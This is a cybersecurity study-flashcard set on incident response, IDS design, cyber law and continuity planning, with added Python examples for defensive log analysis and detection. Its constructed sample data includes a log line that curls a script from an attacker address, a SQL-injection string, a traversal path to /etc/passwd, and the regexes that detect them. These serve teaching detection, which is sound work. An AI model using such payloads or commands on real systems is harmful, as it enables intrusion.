Term
what % of concentrated attacks are successful? |
|
Definition
|
|
Term
what are the four categories of event severity? |
|
Definition
false alarms, minor incidents, major incidents, disasters |
|
|
Term
what are false alarms? |
Definition
situations that seem to be incidents, or potential incidents, but are actually innocent activities |
|
|
Term
in almost all IDSs a large majority of suspicious activities are actually ___ |
|
Definition
false alarms |
|
Term
what are minor incidents? |
|
Definition
true breaches that the on-duty staff can handle and that have no further implications for the firm |
|
|
Term
what are major incidents? |
|
Definition
incidents whose impact is too large for the on-duty IT staff to handle |
|
|
Term
what are the IT incident response teams for major incidents? |
|
Definition
Computer Security Incident Response Teams (CSIRTs) |
|
|
Term
What is the organization of a CSIRT? |
|
Definition
a senior manager to make business decisions; members from the affected line organizations; public relations; legal; human resources |
|
|
Term
what are disasters? |
|
Definition
events that threaten business continuity (the day-to-day, revenue-generating operations of the firm) |
|
|
Term
what is business continuity planning? |
|
Definition
plans that keep a business running, or get it back into operation as quickly as possible |
|
|
Term
what are the four key components of responding to an event? |
|
Definition
speed, accuracy, planning, rehearsal |
|
|
Term
|
Definition
reacting to incidents according to plan |
|
|
Term
what are the types of rehearsals? describe them |
|
Definition
walk-through: the simplest type. Managers and key personnel meet and discuss their roles step by step.
live tests: teams actually take the actions instead of just describing them |
|
|
Term
a walk through is also known as ___ |
|
Definition
a table-top exercise |
|
Term
what are the three priorities at the beginning of an incident? |
|
Definition
detection, analysis, escalation |
|
|
Term
who frequently identifies an attack? |
|
Definition
non-technical employees, because they notice a failed or malfunctioning system |
|
|
Term
much of the intrusion analysis is done by ___ |
|
Definition
reading through the log files for the time period in which the incident probably began |
|
|
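The card above describes the analysis as reading the logs for the window in which the incident probably began. The following is an added example (not from the original page) of that step done programmatically: it selects the events in a time window around a suspected start time, starting a couple of minutes early because the first symptom rarely marks the true start, and then summarizes SSH failures and successes per source address. The log lines are constructed for the example; the 3-failure threshold and the window lengths are illustrative assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample log (auth.log style, UTC timestamps); not from the original page.
SAMPLE_LOG = """\
2024-03-01T02:58:10Z web01 sshd[811]: Accepted publickey for deploy from 10.0.5.20 port 50210
2024-03-01T03:00:02Z web01 sshd[812]: Failed password for root from 203.0.113.7 port 41022
2024-03-01T03:00:03Z web01 sshd[813]: Failed password for root from 203.0.113.7 port 41023
2024-03-01T03:00:05Z web01 sshd[814]: Failed password for admin from 203.0.113.7 port 41025
2024-03-01T03:00:09Z web01 sshd[815]: Accepted password for admin from 203.0.113.7 port 41030
2024-03-01T03:01:40Z web01 sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh
2024-03-01T03:40:00Z web01 sshd[900]: Accepted publickey for deploy from 10.0.5.20 port 50311
"""

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
SRC_RE = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_line(line):
    """Split one log line into (timestamp, host, message)."""
    ts, host, msg = line.split(" ", 2)
    return datetime.strptime(ts, TS_FMT), host, msg


def events_in_window(log_text, start, minutes):
    """Return the events whose timestamp lies in [start, start + minutes)."""
    end = start + timedelta(minutes=minutes)
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, msg = parse_line(line)
        if start <= ts < end:
            events.append((ts, host, msg))
    return events


def summarize(events, fail_threshold=3):
    """Count SSH failures and successes per source IP. A source that failed at
    least fail_threshold times and then logged in successfully is flagged as a
    likely password-guessing success (assumed threshold, for illustration)."""
    fails, successes, suspicious = Counter(), Counter(), []
    for _ts, _host, msg in events:        # events arrive in time order
        if not msg.startswith("sshd"):
            continue
        m = SRC_RE.search(msg)
        if not m:
            continue
        ip = m.group(1)
        if "Failed password" in msg:
            fails[ip] += 1
        elif "Accepted" in msg:
            successes[ip] += 1
            if fails[ip] >= fail_threshold and ip not in suspicious:
                suspicious.append(ip)     # failures preceded this success
    return {"failures": dict(fails), "successes": dict(successes), "suspicious": suspicious}


def analyze(log_text, suspected_start_iso, lead_minutes=2, window_minutes=30):
    """Start a little before the suspected start (clocks and first symptoms are
    rarely exact), cover the window, and summarize what the logs show."""
    suspected_start = datetime.strptime(suspected_start_iso, TS_FMT)
    start = suspected_start - timedelta(minutes=lead_minutes)
    return summarize(events_in_window(log_text, start, window_minutes + lead_minutes))


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG, "2024-03-01T03:00:00Z"))
```

Run against the sample, the window catches the three failed root/admin guesses followed by an accepted password from the same address, and the later sudo line shows what to look at next; the 03:40 login lies outside the window and is not counted.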
Term
what is an issue with blackholing the attacker? |
|
Definition
the attacker knows they have been detected and may return through another, stealthier attack vector |
|
|
Term
what are some of the key objectives during recovery from an incident? |
|
Definition
identify and close backdoors and other problems; restore systems to operation |
|
|
Term
what is a risk during recovery after an attack? |
|
Definition
the attacker may have left backdoors, trojans, viruses, registry changes, or rootkits. These can be difficult to remove completely; some may be missed |
|
|
Term
most companies are more likely to punish an ___ than to try to prosecute an ___ |
|
Definition
employee; attacker |
|
Term
what should be examined before prosecuting an attacker? |
|
Definition
cost and effort; probability of success; loss of reputation |
|
|
Term
what is forensic evidence? |
|
Definition
evidence that is admissible in court |
|
|
Term
regarding forensic evidence, what steps should be taken? |
|
Definition
call the FBI and police during the attack; use a certified forensics expert; preserve the evidence; document the chain of custody |
|
|
Term
A ___ should be done after an attack to ID what went well and what should be changed |
|
Definition
post-mortem (post-incident) review |
|
Term
cyber law is dealing with ___ |
|
Definition
|
|
Term
What are the types of courts? |
|
Definition
U.S. district courts: the lowest level; 94 districts in the U.S.
U.S. circuit courts of appeals: no trials; they selectively review decisions made by the lower courts.
Supreme Court: hears roughly 100 cases per year |
|
|
Term
in the federal court system, the rules for the admissibility of evidence are codified in___ |
|
Definition
the Federal Rules of Evidence |
|
|
Term
federal law regarding hacking is ___ |
|
Definition
U.S. Code Title 18, Part I, Section 1030 (the Computer Fraud and Abuse Act) |
|
|
Term
what are classified as protected computers? |
|
Definition
government computers; financial institution computers; any computer used in interstate or foreign commerce or communication |
|
|
Term
what is a damage threshold? |
|
Definition
the minimum amount of damage that must occur before an attacker is in violation of the law |
|
|
Term
what are the Four major functions of an IDS? |
|
Definition
logging; automated analysis; actions (alarms, reports, and support for the IDS administrator's manual analysis); management |
|
|
Term
what falls under the "action" function of the IDS? |
|
Definition
generate alarms; generate log summary reports; support interactive manual log analysis |
|
|
Term
what falls under the "management" function of the IDS? |
|
Definition
|
|
Term
what falls under the "automated analysis" function of the IDS? |
|
Definition
attack signature matching versus anomaly detection |
|
|
Term
what falls under the "event logging" function of the IDS? |
|
Definition
individual events are time-stamped; events are logged as a flat file; sometimes data is aggregated from multiple IDSs |
|
|
Term
what are the components of a distributed IDS? |
|
Definition
agent: collects event data and stores log files on the monitoring device.
manager and integrated log file: the manager program integrates the information from multiple agents and combines it into a single integrated log file |
|
|
Term
discuss batch vs real time transfer in integrated IDSs |
|
Definition
batch: the least expensive. The agent waits several minutes or hours, then sends its log file to the manager.
real time: each event goes to the manager immediately |
|
|
Term
Communication between agents and manager should be ___ |
|
Definition
secure, with authentication, integrity checking, confidentiality, and anti-replay protection |
|
|
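The cards above describe agents shipping time-stamped events to a manager (in batch or in real time), the manager building one integrated log, and the requirement that agent-manager traffic be authenticated, integrity-checked and replay-protected. The following is an added example of that exchange, not code from the original page: each agent has its own shared key (hypothetical values), every message carries an HMAC over the agent name and payload, and a per-agent sequence number lets the manager reject replays. Confidentiality is not shown; in practice the transport would be wrapped in TLS. Merging by timestamp assumes the agents' clocks are synchronized, which is what NTP provides.

```python
import hashlib
import hmac
import json


class Agent:
    """IDS agent: collects time-stamped events and ships them to the manager.
    mode="batch" buffers events until flush(); mode="realtime" sends each one at once."""

    def __init__(self, name, key, mode="batch"):
        self.name, self.key, self.mode = name, key, mode
        self.seq = 0        # monotonically increasing message counter (anti-replay)
        self.buffer = []    # events waiting for the next batch

    def _pack(self, events):
        self.seq += 1
        payload = json.dumps({"seq": self.seq, "events": events}, sort_keys=True).encode()
        # The tag covers the agent name and the payload, so neither can be altered in transit.
        tag = hmac.new(self.key, self.name.encode() + b"\0" + payload, hashlib.sha256).hexdigest()
        return {"agent": self.name, "payload": payload, "tag": tag}

    def log(self, ts, msg):
        event = {"ts": ts, "msg": msg}
        if self.mode == "realtime":
            return [self._pack([event])]
        self.buffer.append(event)
        return []

    def flush(self):
        if not self.buffer:
            return []
        message = self._pack(self.buffer)
        self.buffer = []
        return [message]


class Manager:
    """Verifies each message, rejects replays, and keeps one time-ordered integrated log."""

    def __init__(self, agent_keys):
        self.agent_keys = agent_keys   # agent name -> shared key
        self.last_seq = {}             # highest sequence number accepted per agent
        self.integrated = []           # (timestamp, agent, message) sorted by timestamp
        self.rejected = []

    def receive(self, message):
        name = message["agent"]
        key = self.agent_keys.get(name)
        if key is None:
            return self._reject(message, "unknown agent")
        expected = hmac.new(key, name.encode() + b"\0" + message["payload"], hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, message["tag"]):
            return self._reject(message, "bad tag")
        data = json.loads(message["payload"])   # parse only after authentication
        if data["seq"] <= self.last_seq.get(name, 0):
            return self._reject(message, "replay")
        self.last_seq[name] = data["seq"]
        for ev in data["events"]:
            self.integrated.append((ev["ts"], name, ev["msg"]))
        self.integrated.sort()                  # timestamps share one format, so string order is time order
        return "accepted"

    def _reject(self, message, reason):
        self.rejected.append((message["agent"], reason))
        return reason


def demo():
    """Constructed scenario: one batch agent, one real-time agent, then a replay and a forgery."""
    keys = {"web01": b"hypothetical-key-web01", "db01": b"hypothetical-key-db01"}
    web = Agent("web01", keys["web01"], mode="batch")
    db = Agent("db01", keys["db01"], mode="realtime")
    manager = Manager(keys)

    outbound = []
    outbound += web.log("2024-03-01T03:00:02Z", "sshd: Failed password for root from 203.0.113.7")
    outbound += db.log("2024-03-01T03:00:04Z", "mysqld: Access denied for user 'root'@'203.0.113.7'")
    outbound += web.log("2024-03-01T03:00:09Z", "sshd: Accepted password for admin from 203.0.113.7")
    outbound += web.flush()                     # batch goes out now, after the real-time message
    results = [manager.receive(m) for m in outbound]

    replay = manager.receive(outbound[0])       # db01's message delivered a second time
    forged = dict(outbound[1], payload=outbound[1]["payload"].replace(b"admin", b"deploy"))
    tampered = manager.receive(forged)          # payload altered, tag no longer matches
    return manager, results, replay, tampered


if __name__ == "__main__":
    manager, results, replay, tampered = demo()
    print(results, replay, tampered)
    for entry in manager.integrated:
        print(entry)
```

Note that the batch from web01 arrives after db01's real-time message yet its first event is ordered before it in the integrated log; that is the point of time-stamping at the agent rather than at arrival, and it only works when the agents' clocks agree.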
Term
what are the two types of IDS agents? |
|
Definition
network IDSs (NIDSs) and host IDSs (HIDSs) |
|
Term
___ captures packets as they travel through a network |
|
Definition
a network IDS (NIDS) |
|
Term
___ are boxes located at various points in the network to capture packets |
|
Definition
stand-alone NIDSs |
|
Term
NIDS ___ scan encrypted data |
|
Definition
cannot |
|
Term
what kind of IDS is placed on the most critical hosts on a network and works on data collected on the host computer to identify possible attacks? |
|
Definition
host IDSs (HIDSs) |
|
Term
What is the Network Time Protocol (NTP)? |
|
Definition
synchronizes the clocks of the logging devices, so that time stamps on events logged by different devices can be compared |
|
|
Term
What is precision in an IDS |
|
Definition
tuning an IDS so that it reports all real attack events while raising as few false alarms as possible (strictly, few false positives is precision; catching every attack is recall, and tuning trades one against the other) |
|
|
Term
how do you tune an IDS for precision? |
|
Definition
turn off unnecessary rules; update attack signatures |
|
|
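The "automated analysis" card contrasts signature matching with anomaly detection, and the two cards above say precision is tuned by turning off unnecessary rules. The following added example (not from the original page) runs both detectors over a small, hand-labelled set of constructed web-server events and measures precision and recall for each, so the effect of disabling a rule can be seen rather than assumed. The rule set, the labels and the "median times two" anomaly baseline are illustrative assumptions.

```python
import re
import statistics
from collections import Counter

# Constructed, hand-labelled events: (message, is_attack). Not from the original page.
EVENTS = [
    ("GET /index.html 200 from 10.0.5.20", False),
    ("GET /login.php?user=admin' OR '1'='1 500 from 203.0.113.7", True),
    ("GET /cgi-bin/../../etc/passwd 404 from 203.0.113.7", True),
    ("GET /docs/report.pdf 200 from 10.0.5.21", False),
    ("POST /api/upload 200 from 10.0.5.22 size=10485760", False),
    ("GET /admin/ 403 from 10.0.5.23", False),
    ("GET /admin/ 403 from 10.0.5.24", False),
    ("GET /admin/ 200 from 203.0.113.7", True),
    ("GET /status 200 from 10.0.5.20", False),
    ("GET /wp-login.php 404 from 203.0.113.7", True),   # scan: no signature matches it
    ("GET /favicon.ico 200 from 10.0.5.20", False),
]

# Hypothetical attack signatures, for illustration only.
RULES = {
    "sqli_quote": re.compile(r"'\s*OR\s*'", re.IGNORECASE),
    "dir_traversal": re.compile(r"\.\./"),
    "admin_path": re.compile(r"/admin/"),         # fires on legitimate, denied requests too
    "large_upload": re.compile(r"size=\d{8,}"),   # unnecessary here: big uploads are normal for this app
}

SRC_RE = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")


def signature_flags(events, rules=RULES, disabled=()):
    """Signature detection: an event is flagged if any enabled rule matches it."""
    flags = []
    for msg, _label in events:
        hits = [name for name, rx in rules.items() if name not in disabled and rx.search(msg)]
        flags.append(bool(hits))
    return flags


def anomaly_flags(events, factor=2.0):
    """Anomaly detection: flag every event from a source whose request count is
    more than factor times the median per-source count (the 'normal' baseline)."""
    sources = [SRC_RE.search(msg).group(1) for msg, _label in events]
    counts = Counter(sources)
    baseline = statistics.median(counts.values())
    noisy = {ip for ip, n in counts.items() if n > factor * baseline}
    return [ip in noisy for ip in sources]


def precision_recall(events, flags):
    """Precision: fraction of flagged events that were attacks.
    Recall: fraction of attacks that were flagged."""
    tp = sum(1 for (_m, attack), f in zip(events, flags) if f and attack)
    fp = sum(1 for (_m, attack), f in zip(events, flags) if f and not attack)
    fn = sum(1 for (_m, attack), f in zip(events, flags) if attack and not f)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall


def tuning_report(events=EVENTS):
    """Compare the rule set as shipped, with the unnecessary rule off, with the
    noisy admin rule also off, and the anomaly detector."""
    return {
        "all_rules": precision_recall(events, signature_flags(events)),
        "no_large_upload": precision_recall(events, signature_flags(events, disabled=("large_upload",))),
        "no_large_upload_no_admin": precision_recall(
            events, signature_flags(events, disabled=("large_upload", "admin_path"))),
        "anomaly": precision_recall(events, anomaly_flags(events)),
    }


if __name__ == "__main__":
    for name, (p, r) in tuning_report().items():
        print(f"{name:26s} precision={p:.2f} recall={r:.2f}")
```

On this data, dropping the irrelevant upload rule raises precision from 0.50 to 0.60 at no cost in recall; also dropping the admin-path rule gives perfect precision but loses a real attack (recall falls to 0.50), which is the trade-off the precision card is about. The anomaly detector is the only one that catches the unsignatured scan, but it also flags a busy internal host, so its precision is 4/7.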
Term
what are the basic principles of business continuity management |
|
Definition
protect people first; recognize that people have reduced decision-making capacity during a crisis; avoid rigidity; communicate |
|
|
Term
what is a hot site? |
|
Definition
a backup site that is fully functional in an emergency: it has power, HVAC, hardware, software, and up-to-date data |
|
|
Term
what is a cold site? |
|
Definition
a backup site that offers power and HVAC but is otherwise empty, with just internet and phone connections |
|
|
Term
what equipment probably holds most of a firm's data? |
|
Definition
|
|